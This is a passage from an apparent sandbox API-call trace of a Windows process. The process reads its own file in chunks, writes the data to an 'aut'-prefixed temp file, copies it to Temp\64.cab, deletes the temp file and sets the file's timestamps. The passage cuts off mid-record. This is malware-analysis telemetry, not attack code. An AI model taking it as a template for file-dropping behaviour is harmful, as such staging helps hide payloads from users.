out: lpBuffer=0x8aec7c*, lpNumberOfBytesRead=0x8aeb68*=0x10000, lpOverlapped=0x0) returned 1 [0133.374] SetFilePointer (in: hFile=0x160, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6ff88 [0133.374] SetFilePointer (in: hFile=0x160, lDistanceToMove=458612, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6ff74 [0133.374] ReadFile (in: hFile=0x160, lpBuffer=0x8aec7c, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8aeb68, lpOverlapped=0x0 | out: lpBuffer=0x8aec7c*, lpNumberOfBytesRead=0x8aeb68*=0x10000, lpOverlapped=0x0) returned 1 [0133.374] SetFilePointer (in: hFile=0x160, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7ff74 [0133.374] SetFilePointer (in: hFile=0x160, lDistanceToMove=524128, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7ff60 [0133.374] ReadFile (in: hFile=0x160, lpBuffer=0x8aec7c, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8aeb68, lpOverlapped=0x0 | out: lpBuffer=0x8aec7c*, lpNumberOfBytesRead=0x8aeb68*=0x10000, lpOverlapped=0x0) returned 1 [0133.375] SetFilePointer (in: hFile=0x160, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8ff60 [0133.375] SetFilePointer (in: hFile=0x160, lDistanceToMove=589644, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8ff4c [0133.375] ReadFile (in: hFile=0x160, lpBuffer=0x8aec7c, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8aeb68, lpOverlapped=0x0 | out: lpBuffer=0x8aec7c*, lpNumberOfBytesRead=0x8aeb68*=0x10000, lpOverlapped=0x0) returned 1 [0133.375] SetFilePointer (in: hFile=0x160, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ff4c [0133.375] SetFilePointer (in: hFile=0x160, lDistanceToMove=655160, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9ff38 [0133.375] ReadFile (in: hFile=0x160, lpBuffer=0x8aec7c, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8aeb68, lpOverlapped=0x0 | out: lpBuffer=0x8aec7c*, lpNumberOfBytesRead=0x8aeb68*=0x10000, lpOverlapped=0x0) returned 1 [0133.375] SetFilePointer (in: hFile=0x160, lDistanceToMove=685588, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa7614 [0133.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1000) returned 0x24b2e00 [0133.375] ReadFile (in: hFile=0x160, lpBuffer=0x24b2e00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x8aeb4c, lpOverlapped=0x0 | out: lpBuffer=0x24b2e00*, lpNumberOfBytesRead=0x8aeb4c*=0x1000, lpOverlapped=0x0) returned 1 [0133.375] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8beb7c | out: lpSystemTimeAsFileTime=0x8beb7c*(dwLowDateTime=0x5a31490, dwHighDateTime=0x1d509d7)) [0133.375] SetFilePointer (in: hFile=0x160, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa8614 [0133.376] GetFileAttributesW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp/64.cab" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\64.cab")) returned 0xffffffff [0133.376] FindFirstFileW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp/64.cab", lpFindFileData=0x8bebe8 | out: lpFindFileData=0x8bebe8*(dwFileAttributes=0xc0, ftCreationTime.dwLowDateTime=0x8bebf8, ftCreationTime.dwHighDateTime=0x41af1a, ftLastAccessTime.dwLowDateTime=0x25c0abc, ftLastAccessTime.dwHighDateTime=0x8bec38, ftLastWriteTime.dwLowDateTime=0x41e2c6, ftLastWriteTime.dwHighDateTime=0x3, nFileSizeHigh=0x41e2bc, nFileSizeLow=0x6ad1c79f, dwReserved0=0x4900b0, dwReserved1=0x3, cFileName="", cAlternateFileName="")) returned 0xffffffff [0133.376] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8adc5c | out: lpSystemTimeAsFileTime=0x8adc5c*(dwLowDateTime=0x5a31490, dwHighDateTime=0x1d509d7)) [0133.376] SetFilePointer (in: hFile=0x160, lDistanceToMove=685608, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa7628 [0133.376] ReadFile (in: hFile=0x160, lpBuffer=0x24b2e00, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x8ad720, lpOverlapped=0x0 | out: lpBuffer=0x24b2e00*, lpNumberOfBytesRead=0x8ad720*=0x200, lpOverlapped=0x0) returned 1 [0133.376] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8ad70c | out: lpSystemTimeAsFileTime=0x8ad70c*(dwLowDateTime=0x5a31490, dwHighDateTime=0x1d509d7)) [0133.376] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8ad70c | out: lpSystemTimeAsFileTime=0x8ad70c*(dwLowDateTime=0x5a31490, dwHighDateTime=0x1d509d7)) [0133.376] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8ad70c | out: lpSystemTimeAsFileTime=0x8ad70c*(dwLowDateTime=0x5a31490, dwHighDateTime=0x1d509d7)) [0133.376] SetFilePointer (in: hFile=0x160, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa7828 [0133.376] SetFilePointer (in: hFile=0x160, lDistanceToMove=685749, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa76b5 [0133.376] ReadFile (in: hFile=0x160, lpBuffer=0x24b2e00, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x8ad720, lpOverlapped=0x0 | out: lpBuffer=0x24b2e00*, lpNumberOfBytesRead=0x8ad720*=0x200, lpOverlapped=0x0) returned 1 [0133.376] SetFilePointer (in: hFile=0x160, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa78b5 [0133.377] SetFilePointer (in: hFile=0x160, lDistanceToMove=704599, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xac057 [0133.377] ReadFile (in: hFile=0x160, lpBuffer=0x24b2e00, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x8ad720, lpOverlapped=0x0 | out: lpBuffer=0x24b2e00*, lpNumberOfBytesRead=0x8ad720*=0x200, lpOverlapped=0x0) returned 1 [0133.377] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8ad70c | out: lpSystemTimeAsFileTime=0x8ad70c*(dwLowDateTime=0x5a31490, dwHighDateTime=0x1d509d7)) [0133.377] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8ad70c | out: lpSystemTimeAsFileTime=0x8ad70c*(dwLowDateTime=0x5a31490, dwHighDateTime=0x1d509d7)) [0133.377] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8ad70c | out: lpSystemTimeAsFileTime=0x8ad70c*(dwLowDateTime=0x5a31490, dwHighDateTime=0x1d509d7)) [0133.377] SetFilePointer (in: hFile=0x160, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xac257 [0133.377] SetFilePointer (in: hFile=0x160, lDistanceToMove=704706, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xac0c2 [0133.377] ReadFile (in: hFile=0x160, lpBuffer=0x24b2e00, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x8ad720, lpOverlapped=0x0 | out: lpBuffer=0x24b2e00*, lpNumberOfBytesRead=0x8ad720*=0x200, lpOverlapped=0x0) returned 1 [0133.377] SetFilePointer (in: hFile=0x160, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xac2c2 [0133.377] SetFilePointer (in: hFile=0x160, lDistanceToMove=753613, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb7fcd [0133.377] ReadFile (in: hFile=0x160, lpBuffer=0x24b2e00, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x8ad720, lpOverlapped=0x0 | out: lpBuffer=0x24b2e00*, lpNumberOfBytesRead=0x8ad720*=0x200, lpOverlapped=0x0) returned 1 [0133.377] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8ad70c | out: lpSystemTimeAsFileTime=0x8ad70c*(dwLowDateTime=0x5a31490, dwHighDateTime=0x1d509d7)) [0133.377] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8ad70c | out: lpSystemTimeAsFileTime=0x8ad70c*(dwLowDateTime=0x5a31490, dwHighDateTime=0x1d509d7)) [0133.377] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8ad70c | out: lpSystemTimeAsFileTime=0x8ad70c*(dwLowDateTime=0x5a31490, dwHighDateTime=0x1d509d7)) [0133.377] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8ada70 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0133.377] GetTempFileNameW (in: lpPathName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\", lpPrefixString="aut", uUnique=0x0, lpTempFileName=0x8ae130 | out: lpTempFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\autDB43.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\autdb43.tmp")) returned 0xdb43 [0133.378] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\autDB43.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\autdb43.tmp"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x8adb44, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0133.378] GetFileType (hFile=0x164) returned 0x1 [0133.378] ReadFile (in: hFile=0x160, lpBuffer=0x8aefc9, nNumberOfBytesToRead=0xc000, lpNumberOfBytesRead=0x8adb80, lpOverlapped=0x0 | out: lpBuffer=0x8aefc9*, lpNumberOfBytesRead=0x8adb80*=0xc000, lpOverlapped=0x0) returned 1 [0133.379] ReadFile (in: hFile=0x160, lpBuffer=0x24b2e00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x8adb70, lpOverlapped=0x0 | out: lpBuffer=0x24b2e00*, lpNumberOfBytesRead=0x8adb70*=0x1000, lpOverlapped=0x0) returned 1 [0133.381] WriteFile (in: hFile=0x164, lpBuffer=0x8aee50*, nNumberOfBytesToWrite=0xc000, lpNumberOfBytesWritten=0x8ac0e4, lpOverlapped=0x0 | out: lpBuffer=0x8aee50*, lpNumberOfBytesWritten=0x8ac0e4*=0xc000, lpOverlapped=0x0) returned 1 [0133.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1000) returned 0x24b3e08 [0133.383] WriteFile (in: hFile=0x164, lpBuffer=0x24b3e08*, nNumberOfBytesToWrite=0x79d, lpNumberOfBytesWritten=0x8ac0f4, lpOverlapped=0x0 | out: lpBuffer=0x24b3e08*, lpNumberOfBytesWritten=0x8ac0f4*=0x79d, lpOverlapped=0x0) returned 1 [0133.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3e08 | out: hHeap=0x25c0000) returned 1 [0133.383] CloseHandle (hObject=0x164) returned 1 [0133.384] CopyFileW (lpExistingFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\autDB43.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\autdb43.tmp"), lpNewFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp/64.cab" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\64.cab"), bFailIfExists=0) returned 1 [0133.388] DeleteFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\autDB43.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\autdb43.tmp")) returned 1 [0133.389] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp/64.cab" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\64.cab"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0133.389] SetFileTime (hFile=0x168, lpCreationTime=0x8adcb8, lpLastAccessTime=0x0, lpLastWriteTime=0x8adcc0) returned 1 [0133.389] CloseHandle (hObject=0x168) returned 1 [0133.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2e00 | out: hHeap=0x25c0000) returned 1 [0133.390] CloseHandle (hObject=0x160) returned 1 [0133.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8f40 | out: hHeap=0x25c0000) returned 1 [0133.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8c88 | out: hHeap=0x25c0000) returned 1 [0133.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0133.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1058 | out: hHeap=0x25c0000) returned 1 [0133.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8f28 | out: hHeap=0x25c0000) returned 1 [0133.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0133.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8d60 | out: hHeap=0x25c0000) returned 1 [0133.390] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0133.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x249d818 [0133.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1058 [0133.390] CharUpperBuffW (in: lpsz="A0110005C00", cchLength=0xb | out: lpsz="A0110005C00") returned 0xb [0133.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249d818 | out: hHeap=0x25c0000) returned 1 [0133.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1058 | out: hHeap=0x25c0000) returned 1 [0133.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8d60 [0133.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1058 [0133.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0133.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8f28 [0133.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1068 [0133.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1068 | out: hHeap=0x25c0000) returned 1 [0133.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a8c88 [0133.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x249d818 [0133.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8f40 [0133.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1068 [0133.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8f40 | out: hHeap=0x25c0000) returned 1 [0133.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24af6b0 [0133.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8f40 [0133.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0133.391] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0133.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b0f98 [0133.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1048 [0133.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8e50 [0133.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8d90 [0133.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1078 [0133.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8eb0 [0133.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1078 | out: hHeap=0x25c0000) returned 1 [0133.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1078 [0133.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24af6d8 [0133.391] CharUpperBuffW (in: lpsz="SSA0110005C00", cchLength=0xd | out: lpsz="SSA0110005C00") returned 0xd [0133.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24af6d8 | out: hHeap=0x25c0000) returned 1 [0133.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1078 | out: hHeap=0x25c0000) returned 1 [0133.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8eb0 | out: hHeap=0x25c0000) returned 1 [0133.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8d90 | out: hHeap=0x25c0000) returned 1 [0133.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8e50 | out: hHeap=0x25c0000) returned 1 [0133.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1048 | out: hHeap=0x25c0000) returned 1 [0133.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b0f98 | out: hHeap=0x25c0000) returned 1 [0133.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0133.392] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0133.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8e50 [0133.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b0f98 [0133.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8e50 | out: hHeap=0x25c0000) returned 1 [0133.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24af6d8 [0133.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8e50 [0133.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8d90 [0133.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1048 [0133.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24af700 [0133.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8eb0 [0133.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1078 [0133.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8eb0 | out: hHeap=0x25c0000) returned 1 [0133.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24af728 [0133.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8eb0 [0133.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8ee0 [0133.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1088 [0133.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8e50 | out: hHeap=0x25c0000) returned 1 [0133.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24af750 [0133.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1098 [0133.392] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24af750 | out: hHeap=0x25c0000) returned 1 [0133.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1098 | out: hHeap=0x25c0000) returned 1 [0133.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8e50 [0133.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1098 [0133.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8e98 [0133.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8ec8 [0133.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10a8 [0133.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0133.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0133.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8f10 [0133.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10a8 | out: hHeap=0x25c0000) returned 1 [0133.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a8f58 [0133.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24af750 [0133.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8f70 [0133.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10a8 [0133.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8f70 | out: hHeap=0x25c0000) returned 1 [0133.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24af778 [0133.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8f70 [0133.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8f88 [0133.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0133.393] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8fa0 [0133.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0133.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8fa0 | out: hHeap=0x25c0000) returned 1 [0133.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24af7a0 [0133.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8fa0 [0133.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8fb8 [0133.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10c8 [0133.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24af7c8 [0133.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8fd0 [0133.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10d8 [0133.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8fd0 | out: hHeap=0x25c0000) returned 1 [0133.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24af7f0 [0133.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8fd0 [0133.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8fe8 [0133.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24af7a0 | out: hHeap=0x25c0000) returned 1 [0133.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0133.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8fa0 | out: hHeap=0x25c0000) returned 1 [0133.394] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24af7a0 [0133.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8fa0 [0133.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0133.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9000 [0133.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10e8 [0133.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10e8 | out: hHeap=0x25c0000) returned 1 [0133.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10e8 [0133.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9018 [0133.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9030 [0133.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10f8 [0133.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9048 [0133.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10f8 | out: hHeap=0x25c0000) returned 1 [0133.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9048 | out: hHeap=0x25c0000) returned 1 [0133.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9030 | out: hHeap=0x25c0000) returned 1 [0133.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9018 | out: hHeap=0x25c0000) returned 1 [0133.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10e8 | out: hHeap=0x25c0000) returned 1 [0133.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10e8 [0133.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10e8 | out: hHeap=0x25c0000) returned 1 [0133.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d720 [0133.395] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10e8 [0133.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 